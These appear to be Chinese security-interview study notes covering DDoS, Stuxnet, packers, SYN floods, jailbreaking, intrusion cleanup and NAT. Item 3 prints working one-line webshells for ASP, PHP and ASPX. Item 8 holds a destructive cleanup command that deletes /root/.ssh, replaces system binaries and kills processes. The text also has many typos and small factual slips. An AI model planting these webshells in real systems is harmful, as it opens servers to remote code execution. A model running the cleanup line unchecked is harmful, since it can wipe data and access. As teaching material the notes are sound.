信息安全面试题（二）

 1、ssh   Secure Shell 的缩写，

DDOS 分布式决绝服务（DDOS：Distributed Denial of service）攻击，借助客户端和服务器技术 ，将多个极端及联合起来作为攻击平台，对一个或者多个目标发动DDOS攻击，从而成倍的提高拒绝服务攻击等能力，攻击者使用一个偷窃账号将DDOS主控程序安装到一个计算机上，在一定的事件主控程序与大量代理程序通讯，代理程序已经被安装在网络上的很多计算机上，代理程序收到指令时 发动很多攻击，利用客户端客户服务技术，主控程序在几秒钟内激活上千次代理程序运行。

2、震网病毒

   指的是一种蠕虫病毒，是第一个专门指向真实世界中的病毒，水电站，国家电网，只要电脑操作员将病毒感染的U盘，USB接口，这种病毒会取得工业电脑系统的控制权。 这种病毒可以破坏工业控制系统无需借助网络传播，不一窃取信息为目的。

3、一句话木马

    ASP  ： <%execute(request("values"))%>

    php:  <?php@eval($_POST[value]);?>

 变形 <?php$x=$_get['z'];@eval("$x;");?>

   aspx一句话木马：

     <%@Page Language="Jscript"%>

    <%eval(Request.Item["Value"])%>

4、手工查询后门和木马的小技巧

   首先输入msconfig   开启动项中查看程度列表中的这在运行的列表。后门木马大多都会为自己的系统服务注册，达到开机启动的目的，找到之后打开对应的路径之间删除，找到程序文件，直接删除并禁止子启动。

   查看，系统关键目录System32和系统目录Windows下的文件，查看网络连接是否正常运行开启的端口号， 或者360流量监控，特别注意远程连接的端口号，8000是灰鸽子默认的端口，病毒查杀工具进行查杀

5、脱壳

   壳是一段执行与原始程序之前的代码，原始成俗在加壳的过程中被压缩，加密，当加壳后的文件执行时，壳 这段代码限于原始程序运行，他把压缩加密后的代码还原成原始程序的代码，然后再把程序还原给原始代码，软件的加壳分为加密可 压缩壳  伪装壳 多层壳等。目的都是为了隐藏程序的真正的OEP（入口点 防止被破解）

    加壳指的是对编译好的exe dll 等文件采用加壳来进行保护，脱壳指的是将文件的外边的壳去除，活肤文件没有加壳的状态。壳出于程序作者对程序资源压缩 注册保护的目的。把壳分为压缩壳  加密壳 三种，常见的压缩手段包括  FSG   ASPack   UPX PELock 幻影 等，密码壳使用的不多 ，加密的壳程序只有在正确输入密码之后才会运行

6、人肉搜索

  是一种类似比的称呼，主要用来区别传统的搜索引擎。

SYN Flood 的基本原理

   SYN Flood 是当前最流行的拒绝服务攻击，利用TCP协议缺陷发送大量的TCP请求连接而耗尽。防御方法是 将服务器响应 SYN报文时间减少，或者设置SYN cookie 就是非每一个请求的连接的IP地址一个cookie，如果短时间内连续受到某个IP的重读SYN报文，就认定了攻击以后丢弃该IP地址发送的报文

     但是如果攻击中者利用 SOC_Raw 随机改写IP报文中的源地址 ，则以上方式不起作用

7、手机越狱

   IOS系统的越狱就是取得系统的最高权限，越狱券后的IOS系统本身不会发生本质上的改变 只是

   越狱之后手机的操作性更加强大，可以修改手机的内容，安装免费破解的软件自定义功能 美化

    越狱之后可绕过 AppStore 下载应用程序 ，同时后台程序运行 周免等主题都会增加耗电量  越狱技术打破IOS的系统封闭 所以手机相对不安全。

8、主机入侵  如何解决

     病毒木马的排除 ：

使用netstat查看网络连接，分析是否有可疑发送行为，如有则停止。 (linux常见木马，清理命令chattr -i /usr/bin/.sshd; rm -f /usr/bin/.sshd; chattr -i /usr/bin/.swhd; rm -f /usr/bin/.swhd; rm -f -r /usr/bin/bsd-port; cp /usr/bin/dpkgd/ps /bin/ps; cp /usr/bin/dpkgd/netstat /bin/netstat; cp /usr/bin/dpkgd/lsof /usr/sbin/lsof; cp /usr/bin/dpkgd/ss /usr/sbin/ss;rm -r -f /root/.ssh; rm -r -f /usr/bin/bsd-port;find /proc/ -name exe | xargs ls -l | grep -v task |grep deleted| awk '{print $11}' | awk -F/ '{print $NF}' | xargs killall -9;）

使用杀毒软件进行查杀  使用服务器漏洞扫描软件进行查杀   查看服务器是否有异地登录 

9、网络地址转换 协议

  内网计算机以内网NAT（网络地址转换）协议，通过一个公共网关访问Internet，内网的计算机可以向internet 上

  内网的计算机可以与公网的地址相互转化，将大量的内网IP地址转换成为一个少量的公网IP地址，减少公网IP地址的占用，NAT的最典型的应用是，在一个局域网内，只需要一台计算机连接上互联网上，就可以利用NAT共享Internet，使用局域网内的计算机可以访问互联网上的计算机，但是 Internet上的计算机无法访问局域网内部的计算机